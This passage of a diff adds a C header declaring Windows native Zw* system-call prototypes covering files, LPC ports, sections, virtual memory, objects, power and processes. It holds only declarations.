OPTIONAL PLARGE_INTEGER Timeout + ); + + + +NTSTATUS +NTAPI +ZwWaitForKeyedEvent ( + IN HANDLE KeyedEventHandle, + IN PVOID KeyValue, + IN BOOLEAN Alertable, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + + +NTSTATUS +NTAPI +ZwQuerySystemInformation ( + IN SYSTEM_INFORMATION_CLASS SystemInformationClass, + OUT OPTIONAL PVOID SystemInformation, + IN ULONG SystemInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwSetSystemInformation ( + IN SYSTEM_INFORMATION_CLASS SystemInformationClass, + IN OPTIONAL PVOID SystemInformation, + IN ULONG SystemInformationLength + ); + + + +NTSTATUS +NTAPI +ZwSystemDebugControl ( + IN SYSDBG_COMMAND Command, + IN OPTIONAL PVOID InputBuffer, + IN ULONG InputBufferLength, + OUT OPTIONAL PVOID OutputBuffer, + IN ULONG OutputBufferLength, + OUT OPTIONAL PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwRaiseHardError ( + IN NTSTATUS ErrorStatus, + IN ULONG NumberOfParameters, + IN ULONG UnicodeStringParameterMask, + IN OPTIONAL PULONG_PTR Parameters, + IN ULONG ValidResponseOptions, + OUT PULONG Response + ); + + + +NTSTATUS +NTAPI +ZwQueryDefaultLocale ( + IN BOOLEAN UserProfile, + OUT PLCID DefaultLocaleId + ); + + + +NTSTATUS +NTAPI +ZwSetDefaultLocale ( + IN BOOLEAN UserProfile, + IN LCID DefaultLocaleId + ); + + + +NTSTATUS +NTAPI +ZwQueryInstallUILanguage ( + OUT LANGID *InstallUILanguageId + ); + + + +NTSTATUS +NTAPI +ZwQueryDefaultUILanguage ( + OUT LANGID *DefaultUILanguageId + ); + + + +NTSTATUS +NTAPI +ZwSetDefaultUILanguage ( + IN LANGID DefaultUILanguageId + ); + + + +NTSTATUS +NTAPI +ZwSetDefaultHardErrorPort( + IN HANDLE DefaultHardErrorPort + ); + + + +NTSTATUS +NTAPI +ZwShutdownSystem ( + IN SHUTDOWN_ACTION Action + ); + + + +NTSTATUS +NTAPI +ZwDisplayString ( + IN PUNICODE_STRING String + ); + + + +NTSTATUS +NTAPI +ZwAddAtom ( + IN OPTIONAL PWSTR AtomName, + IN ULONG Length, + OUT OPTIONAL PRTL_ATOM Atom + ); + + + +NTSTATUS +NTAPI +ZwFindAtom ( + IN OPTIONAL PWSTR AtomName, + IN ULONG Length, + OUT OPTIONAL PRTL_ATOM Atom + ); + + + +NTSTATUS +NTAPI +ZwDeleteAtom ( + IN RTL_ATOM Atom + ); + + + +NTSTATUS +NTAPI +ZwQueryInformationAtom( + IN RTL_ATOM Atom, + IN ATOM_INFORMATION_CLASS AtomInformationClass, + OUT OPTIONAL PVOID AtomInformation, + IN ULONG AtomInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwCancelIoFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock + ); + + + +NTSTATUS +NTAPI +ZwCreateNamedPipeFile ( + OUT PHANDLE FileHandle, + IN ULONG DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG ShareAccess, + IN ULONG CreateDisposition, + IN ULONG CreateOptions, + IN ULONG NamedPipeType, + IN ULONG ReadMode, + IN ULONG CompletionMode, + IN ULONG MaximumInstances, + IN ULONG InboundQuota, + IN ULONG OutboundQuota, + IN OPTIONAL PLARGE_INTEGER DefaultTimeout + ); + + + +NTSTATUS +NTAPI +ZwCreateMailslotFile ( + OUT PHANDLE FileHandle, + IN ULONG DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG CreateOptions, + IN ULONG MailslotQuota, + IN ULONG MaximumMessageSize, + IN PLARGE_INTEGER ReadTimeout + ); + + + +NTSTATUS +NTAPI +ZwDeleteFile ( + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwFlushBuffersFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock + ); + + + +NTSTATUS +NTAPI +ZwNotifyChangeDirectoryFile ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN ULONG CompletionFilter, + IN BOOLEAN WatchTree + ); + + + +NTSTATUS +NTAPI +ZwQueryAttributesFile ( + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PFILE_BASIC_INFORMATION FileInformation + ); + + + +NTSTATUS +NTAPI +ZwQueryFullAttributesFile( + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PFILE_NETWORK_OPEN_INFORMATION FileInformation + ); + + + +NTSTATUS +NTAPI +ZwQueryEaFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN BOOLEAN ReturnSingleEntry, + IN PVOID EaList, + IN ULONG EaListLength, + IN OPTIONAL PULONG EaIndex OPTIONAL, + IN BOOLEAN RestartScan + ); + + +NTSTATUS +NTAPI +ZwCreateFile ( + OUT PHANDLE FileHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN OPTIONAL PLARGE_INTEGER AllocationSize, + IN ULONG FileAttributes, + IN ULONG ShareAccess, + IN ULONG CreateDisposition, + IN ULONG CreateOptions, + IN OPTIONAL PVOID EaBuffer, + IN ULONG EaLength + ); + + + +NTSTATUS +NTAPI +ZwDeviceIoControlFile ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG IoControlCode, + IN OPTIONAL PVOID InputBuffer, + IN ULONG InputBufferLength, + OUT OPTIONAL PVOID OutputBuffer, + IN ULONG OutputBufferLength + ); + + + +NTSTATUS +NTAPI +ZwFsControlFile ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG FsControlCode, + IN OPTIONAL PVOID InputBuffer, + IN ULONG InputBufferLength, + OUT OPTIONAL PVOID OutputBuffer, + IN ULONG OutputBufferLength + ); + + + +NTSTATUS +NTAPI +ZwLockFile ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PLARGE_INTEGER ByteOffset, + IN PLARGE_INTEGER Length, + IN ULONG Key, + IN BOOLEAN FailImmediately, + IN BOOLEAN ExclusiveLock + ); + + + +NTSTATUS +NTAPI +ZwOpenFile ( + OUT PHANDLE FileHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG ShareAccess, + IN ULONG OpenOptions + ); + + + +NTSTATUS +NTAPI +ZwQueryDirectoryFile ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass, + IN BOOLEAN ReturnSingleEntry, + IN OPTIONAL PUNICODE_STRING FileName, + IN BOOLEAN RestartScan + ); + + + +NTSTATUS +NTAPI +ZwQueryInformationFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass + ); + + + +NTSTATUS +NTAPI +ZwQueryQuotaInformationFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN BOOLEAN ReturnSingleEntry, + IN OPTIONAL PVOID SidList, + IN ULONG SidListLength, + IN OPTIONAL PSID StartSid, + IN BOOLEAN RestartScan + ); + + + +NTSTATUS +NTAPI +ZwQueryVolumeInformationFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FsInformation, + IN ULONG Length, + IN FS_INFORMATION_CLASS FsInformationClass + ); + + + +NTSTATUS +NTAPI +ZwReadFile ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN OPTIONAL PLARGE_INTEGER ByteOffset, + IN OPTIONAL PULONG Key + ); + + + +NTSTATUS +NTAPI +ZwSetInformationFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass + ); + + + +NTSTATUS +NTAPI +ZwSetQuotaInformationFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length + ); + + + +NTSTATUS +NTAPI +ZwSetVolumeInformationFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID FsInformation, + IN ULONG Length, + IN FS_INFORMATION_CLASS FsInformationClass + ); + + + +NTSTATUS +NTAPI +ZwWriteFile ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length, + IN OPTIONAL PLARGE_INTEGER ByteOffset, + IN OPTIONAL PULONG Key + ); + + + +NTSTATUS +NTAPI +ZwUnlockFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PLARGE_INTEGER ByteOffset, + IN PLARGE_INTEGER Length, + IN ULONG Key + ); + + + +NTSTATUS +NTAPI +ZwReadFileScatter ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PFILE_SEGMENT_ELEMENT SegmentArray, + IN ULONG Length, + IN OPTIONAL PLARGE_INTEGER ByteOffset, + IN OPTIONAL PULONG Key + ); + + + +NTSTATUS +NTAPI +ZwSetEaFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length + ); + + + +NTSTATUS +NTAPI +ZwWriteFileGather ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PFILE_SEGMENT_ELEMENT SegmentArray, + IN ULONG Length, + IN OPTIONAL PLARGE_INTEGER ByteOffset, + IN OPTIONAL PULONG Key + ); + + + +NTSTATUS +NTAPI +ZwLoadDriver ( + IN PUNICODE_STRING DriverServiceName + ); + + + +NTSTATUS +NTAPI +ZwUnloadDriver ( + IN PUNICODE_STRING DriverServiceName + ); + + + +NTSTATUS +NTAPI +ZwCreateIoCompletion ( + OUT PHANDLE IoCompletionHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG Count OPTIONAL + ); + + + +NTSTATUS +NTAPI +ZwOpenIoCompletion ( + OUT PHANDLE IoCompletionHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwQueryIoCompletion ( + IN HANDLE IoCompletionHandle, + IN IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass, + OUT PVOID IoCompletionInformation, + IN ULONG IoCompletionInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwSetIoCompletion ( + IN HANDLE IoCompletionHandle, + IN PVOID KeyContext, + IN OPTIONAL PVOID ApcContext, + IN NTSTATUS IoStatus, + IN ULONG_PTR IoStatusInformation + ); + + + +NTSTATUS +NTAPI +ZwRemoveIoCompletion ( + IN HANDLE IoCompletionHandle, + OUT PVOID *KeyContext, + OUT PVOID *ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + + +NTSTATUS +NTAPI +ZwCallbackReturn ( + IN PVOID OutputBuffer OPTIONAL, + IN ULONG OutputLength, + IN NTSTATUS Status + ); + + + +NTSTATUS +NTAPI +ZwQueryDebugFilterState ( + IN ULONG ComponentId, + IN ULONG Level + ); + + + +NTSTATUS +NTAPI +ZwSetDebugFilterState ( + IN ULONG ComponentId, + IN ULONG Level, + IN BOOLEAN State + ); + + + +NTSTATUS +NTAPI +ZwYieldExecution ( + VOID + ); + + + +NTSTATUS +NTAPI +ZwCreatePort( + OUT PHANDLE PortHandle, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG MaxConnectionInfoLength, + IN ULONG MaxMessageLength, + IN OPTIONAL ULONG MaxPoolUsage + ); + + + +NTSTATUS +NTAPI +ZwCreateWaitablePort( + OUT PHANDLE PortHandle, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG MaxConnectionInfoLength, + IN ULONG MaxMessageLength, + IN OPTIONAL ULONG MaxPoolUsage + ); + + + +NTSTATUS +NTAPI +ZwConnectPort( + OUT PHANDLE PortHandle, + IN PUNICODE_STRING PortName, + IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, + IN OUT OPTIONAL PPORT_VIEW ClientView, + IN OUT OPTIONAL PREMOTE_PORT_VIEW ServerView, + OUT OPTIONAL PULONG MaxMessageLength, + IN OUT OPTIONAL PVOID ConnectionInformation, + IN OUT OPTIONAL PULONG ConnectionInformationLength + ); + + + +NTSTATUS +NTAPI +ZwSecureConnectPort( + OUT PHANDLE PortHandle, + IN PUNICODE_STRING PortName, + IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, + IN OUT OPTIONAL PPORT_VIEW ClientView, + IN OPTIONAL PSID RequiredServerSid, + IN OUT OPTIONAL PREMOTE_PORT_VIEW ServerView, + OUT OPTIONAL PULONG MaxMessageLength, + IN OUT OPTIONAL PVOID ConnectionInformation, + IN OUT OPTIONAL PULONG ConnectionInformationLength + ); + + + +NTSTATUS +NTAPI +ZwListenPort( + IN HANDLE PortHandle, + OUT PPORT_MESSAGE ConnectionRequest + ); + + + +NTSTATUS +NTAPI +ZwAcceptConnectPort( + OUT PHANDLE PortHandle, + IN OPTIONAL PVOID PortContext, + IN PPORT_MESSAGE ConnectionRequest, + IN BOOLEAN AcceptConnection, + IN OUT OPTIONAL PPORT_VIEW ServerView, + OUT OPTIONAL PREMOTE_PORT_VIEW ClientView + ); + + + +NTSTATUS +NTAPI +ZwCompleteConnectPort( + IN HANDLE PortHandle + ); + + + +NTSTATUS +NTAPI +ZwRequestPort( + IN HANDLE PortHandle, + IN PPORT_MESSAGE RequestMessage + ); + + + +NTSTATUS +NTAPI +ZwRequestWaitReplyPort( + IN HANDLE PortHandle, + IN PPORT_MESSAGE RequestMessage, + OUT PPORT_MESSAGE ReplyMessage + ); + + + +NTSTATUS +NTAPI +ZwReplyPort( + IN HANDLE PortHandle, + IN PPORT_MESSAGE ReplyMessage + ); + + + +NTSTATUS +NTAPI +ZwReplyWaitReplyPort( + IN HANDLE PortHandle, + IN OUT PPORT_MESSAGE ReplyMessage + ); + + + +NTSTATUS +NTAPI +ZwReplyWaitReceivePort( + IN HANDLE PortHandle, + OUT OPTIONAL PVOID *PortContext , + IN OPTIONAL PPORT_MESSAGE ReplyMessage, + OUT PPORT_MESSAGE ReceiveMessage + ); + + + +NTSTATUS +NTAPI +ZwReplyWaitReceivePortEx( + IN HANDLE PortHandle, + OUT OPTIONAL PVOID *PortContext, + IN OPTIONAL PPORT_MESSAGE ReplyMessage, + OUT PPORT_MESSAGE ReceiveMessage, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + + +NTSTATUS +NTAPI +ZwImpersonateClientOfPort( + IN HANDLE PortHandle, + IN PPORT_MESSAGE Message + ); + + + +NTSTATUS +NTAPI +ZwReadRequestData( + IN HANDLE PortHandle, + IN PPORT_MESSAGE Message, + IN ULONG DataEntryIndex, + OUT PVOID Buffer, + IN SIZE_T BufferSize, + OUT OPTIONAL PSIZE_T NumberOfBytesRead + ); + + + +NTSTATUS +NTAPI +ZwWriteRequestData( + IN HANDLE PortHandle, + IN PPORT_MESSAGE Message, + IN ULONG DataEntryIndex, + IN PVOID Buffer, + IN SIZE_T BufferSize, + OUT OPTIONAL PSIZE_T NumberOfBytesWritten + ); + + + +NTSTATUS +NTAPI +ZwQueryInformationPort( + IN HANDLE PortHandle, + IN PORT_INFORMATION_CLASS PortInformationClass, + OUT PVOID PortInformation, + IN ULONG Length, + OUT OPTIONAL PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwCreateSection ( + OUT PHANDLE SectionHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN OPTIONAL PLARGE_INTEGER MaximumSize, + IN ULONG SectionPageProtection, + IN ULONG AllocationAttributes, + IN OPTIONAL HANDLE FileHandle + ); + + + +NTSTATUS +NTAPI +ZwOpenSection ( + OUT PHANDLE SectionHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwMapViewOfSection ( + IN HANDLE SectionHandle, + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG_PTR ZeroBits, + IN SIZE_T CommitSize, + IN OUT OPTIONAL PLARGE_INTEGER SectionOffset, + IN OUT PSIZE_T ViewSize, + IN SECTION_INHERIT InheritDisposition, + IN ULONG AllocationType, + IN ULONG Win32Protect + ); + + + +NTSTATUS +NTAPI +ZwUnmapViewOfSection ( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress + ); + + + +NTSTATUS +NTAPI +ZwExtendSection ( + IN HANDLE SectionHandle, + IN OUT PLARGE_INTEGER NewSectionSize + ); + + + +NTSTATUS +NTAPI +ZwAreMappedFilesTheSame ( + IN PVOID File1MappedAsAnImage, + IN PVOID File2MappedAsFile + ); + + + +NTSTATUS +NTAPI +ZwAllocateVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG_PTR ZeroBits, + IN OUT PSIZE_T RegionSize, + IN ULONG AllocationType, + IN ULONG Protect + ); + + + +NTSTATUS +NTAPI +ZwFreeVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PSIZE_T RegionSize, + IN ULONG FreeType + ); + + + +NTSTATUS +NTAPI +ZwReadVirtualMemory ( + IN HANDLE ProcessHandle, + IN OPTIONAL PVOID BaseAddress, + OUT PVOID Buffer, + IN SIZE_T BufferSize, + OUT OPTIONAL PSIZE_T NumberOfBytesRead + ); + + + +NTSTATUS +NTAPI +ZwWriteVirtualMemory ( + IN HANDLE ProcessHandle, + IN OPTIONAL PVOID BaseAddress, + IN CONST VOID *Buffer, + IN SIZE_T BufferSize, + OUT OPTIONAL PSIZE_T NumberOfBytesWritten + ); + + + +NTSTATUS +NTAPI +ZwFlushVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PSIZE_T RegionSize, + OUT PIO_STATUS_BLOCK IoStatus + ); + + + +NTSTATUS +NTAPI +ZwLockVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PSIZE_T RegionSize, + IN ULONG MapType + ); + + + +NTSTATUS +NTAPI +ZwUnlockVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PSIZE_T RegionSize, + IN ULONG MapType + ); + + + +NTSTATUS +NTAPI +ZwProtectVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PSIZE_T RegionSize, + IN ULONG NewProtect, + OUT PULONG OldProtect + ); + + + +NTSTATUS +NTAPI +ZwQueryVirtualMemory ( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress, + IN MEMORY_INFORMATION_CLASS MemoryInformationClass, + OUT PVOID MemoryInformation, + IN SIZE_T MemoryInformationLength, + OUT OPTIONAL PSIZE_T ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwQuerySection ( + IN HANDLE SectionHandle, + IN SECTION_INFORMATION_CLASS SectionInformationClass, + OUT PVOID SectionInformation, + IN SIZE_T SectionInformationLength, + OUT OPTIONAL PSIZE_T ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwMapUserPhysicalPages ( + IN PVOID VirtualAddress, + IN ULONG_PTR NumberOfPages, + IN OPTIONAL PULONG_PTR UserPfnArray + ); + + + +NTSTATUS +NTAPI +ZwMapUserPhysicalPagesScatter ( + IN PVOID *VirtualAddresses, + IN ULONG_PTR NumberOfPages, + IN OPTIONAL PULONG_PTR UserPfnArray + ); + + + +NTSTATUS +NTAPI +ZwAllocateUserPhysicalPages ( + IN HANDLE ProcessHandle, + IN OUT PULONG_PTR NumberOfPages, + OUT PULONG_PTR UserPfnArray + ); + + + +NTSTATUS +NTAPI +ZwFreeUserPhysicalPages ( + IN HANDLE ProcessHandle, + IN OUT PULONG_PTR NumberOfPages, + IN PULONG_PTR UserPfnArray + ); + + + +NTSTATUS +NTAPI +ZwGetWriteWatch ( + IN HANDLE ProcessHandle, + IN ULONG Flags, + IN PVOID BaseAddress, + IN SIZE_T RegionSize, + OUT PVOID *UserAddressArray, + IN OUT PULONG_PTR EntriesInUserAddressArray, + OUT PULONG Granularity + ); + + + +NTSTATUS +NTAPI +ZwResetWriteWatch ( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress, + IN SIZE_T RegionSize + ); + + + +NTSTATUS +NTAPI +ZwCreatePagingFile ( + IN PUNICODE_STRING PageFileName, + IN PLARGE_INTEGER MinimumSize, + IN PLARGE_INTEGER MaximumSize, + IN ULONG Priority + ); + + + +NTSTATUS +NTAPI +ZwFlushInstructionCache ( + IN HANDLE ProcessHandle, + IN OPTIONAL PVOID BaseAddress, + IN SIZE_T Length + ); + + + +NTSTATUS +NTAPI +ZwFlushWriteBuffer ( + VOID + ); + + + +NTSTATUS +NTAPI +ZwQueryObject ( + IN HANDLE Handle, + IN OBJECT_INFORMATION_CLASS ObjectInformationClass, + OUT PVOID ObjectInformation, + IN ULONG ObjectInformationLength, + OUT PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwSetInformationObject ( + IN HANDLE Handle, + IN OBJECT_INFORMATION_CLASS ObjectInformationClass, + IN PVOID ObjectInformation, + IN ULONG ObjectInformationLength + ); + + + +NTSTATUS +NTAPI +ZwDuplicateObject ( + IN HANDLE SourceProcessHandle, + IN HANDLE SourceHandle, + IN OPTIONAL HANDLE TargetProcessHandle, + OUT PHANDLE TargetHandle, + IN ACCESS_MASK DesiredAccess, + IN ULONG HandleAttributes, + IN ULONG Options + ); + + + +NTSTATUS +NTAPI +ZwMakeTemporaryObject ( + IN HANDLE Handle + ); + + + +NTSTATUS +NTAPI +ZwMakePermanentObject ( + IN HANDLE Handle + ); + + + +NTSTATUS +NTAPI +ZwSignalAndWaitForSingleObject ( + IN HANDLE SignalHandle, + IN HANDLE WaitHandle, + IN BOOLEAN Alertable, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + + +NTSTATUS +NTAPI +ZwWaitForSingleObject ( + IN HANDLE Handle, + IN BOOLEAN Alertable, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + + +NTSTATUS +NTAPI +ZwWaitForMultipleObjects ( + IN ULONG Count, + IN HANDLE Handles[], + IN WAIT_TYPE WaitType, + IN BOOLEAN Alertable, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + + +NTSTATUS +NTAPI +ZwWaitForMultipleObjects32 ( + IN ULONG Count, + IN LONG Handles[], + IN WAIT_TYPE WaitType, + IN BOOLEAN Alertable, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + + +NTSTATUS +NTAPI +ZwSetSecurityObject ( + IN HANDLE Handle, + IN SECURITY_INFORMATION SecurityInformation, + IN PSECURITY_DESCRIPTOR SecurityDescriptor + ); + + + +NTSTATUS +NTAPI +ZwQuerySecurityObject ( + IN HANDLE Handle, + IN SECURITY_INFORMATION SecurityInformation, + OUT PSECURITY_DESCRIPTOR SecurityDescriptor, + IN ULONG Length, + OUT PULONG LengthNeeded + ); + + + +NTSTATUS +NTAPI +ZwClose ( + IN HANDLE Handle + ); + + + +NTSTATUS +NTAPI +ZwCreateDirectoryObject ( + OUT PHANDLE DirectoryHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwOpenDirectoryObject ( + OUT PHANDLE DirectoryHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwQueryDirectoryObject ( + IN HANDLE DirectoryHandle, + OUT PVOID Buffer, + IN ULONG Length, + IN BOOLEAN ReturnSingleEntry, + IN BOOLEAN RestartScan, + IN OUT PULONG Context, + OUT PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwCreateSymbolicLinkObject ( + OUT PHANDLE LinkHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN PUNICODE_STRING LinkTarget + ); + + + +NTSTATUS +NTAPI +ZwOpenSymbolicLinkObject ( + OUT PHANDLE LinkHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwQuerySymbolicLinkObject ( + IN HANDLE LinkHandle, + IN OUT PUNICODE_STRING LinkTarget, + OUT PULONG ReturnedLength + ); + + + +NTSTATUS +NTAPI +ZwGetPlugPlayEvent ( + IN HANDLE EventHandle, + IN OPTIONAL PVOID Context, + OUT PPLUGPLAY_EVENT_BLOCK EventBlock, + IN ULONG EventBufferSize + ); + + + +NTSTATUS +NTAPI +ZwPlugPlayControl( + IN PLUGPLAY_CONTROL_CLASS PnPControlClass, + IN OUT PVOID PnPControlData, + IN ULONG PnPControlDataLength + ); + + + +NTSTATUS +NTAPI +ZwPowerInformation( + IN POWER_INFORMATION_LEVEL InformationLevel, + IN OPTIONAL PVOID InputBuffer, + IN ULONG InputBufferLength, + OUT OPTIONAL PVOID OutputBuffer, + IN ULONG OutputBufferLength + ); + + + +NTSTATUS +NTAPI +ZwSetThreadExecutionState( + IN EXECUTION_STATE esFlags, // ES_xxx flags + OUT EXECUTION_STATE *PreviousFlags + ); + + + +NTSTATUS +NTAPI +ZwRequestWakeupLatency( + IN LATENCY_TIME latency + ); + + + +// NTSTATUS +// NTAPI +// ZwInitiatePowerAction( +// IN POWER_ACTION SystemAction, +// IN SYSTEM_POWER_STATE MinSystemState, +// IN ULONG Flags, // POWER_ACTION_xxx flags +// IN BOOLEAN Asynchronous +// ); + + + +// NTSTATUS +// NTAPI +// ZwSetSystemPowerState( +// IN POWER_ACTION SystemAction, +// IN SYSTEM_POWER_STATE MinSystemState, +// IN ULONG Flags // POWER_ACTION_xxx flags +// ); + + + +// NTSTATUS +// NTAPI +// ZwGetDevicePowerState( +// IN HANDLE Device, +// OUT DEVICE_POWER_STATE *State +// ); + + + +NTSTATUS +NTAPI +ZwCancelDeviceWakeupRequest( + IN HANDLE Device + ); + + + +NTSTATUS +NTAPI +ZwRequestDeviceWakeup( + IN HANDLE Device + ); + + + +NTSTATUS +NTAPI +ZwCreateProcess ( + OUT PHANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN HANDLE ParentProcess, + IN BOOLEAN InheritObjectTable, + IN OPTIONAL HANDLE SectionHandle, + IN OPTIONAL HANDLE DebugPort, + IN OPTIONAL HANDLE ExceptionPort + ); + + + +NTSTATUS +NTAPI +ZwCreateProcessEx ( + OUT PHANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN HANDLE ParentProcess, + IN ULONG Flags, + IN OPTIONAL HANDLE SectionHandle, + IN OPTIONAL HANDLE DebugPort, + IN OPTIONAL HANDLE ExceptionPort, + IN ULONG JobMemberLevel + ); + + + +NTSTATUS +NTAPI +ZwOpenProcess ( + OUT PHANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN OPTIONAL PCLIENT_ID ClientId + ); + + + +NTSTATUS +NTAPI +ZwTerminateProcess ( + IN OPTIONAL HANDLE ProcessHandle, + IN NTSTATUS ExitStatus + ); + + + +NTSTATUS +NTAPI +ZwQueryInformationProcess ( + IN HANDLE ProcessHandle, + 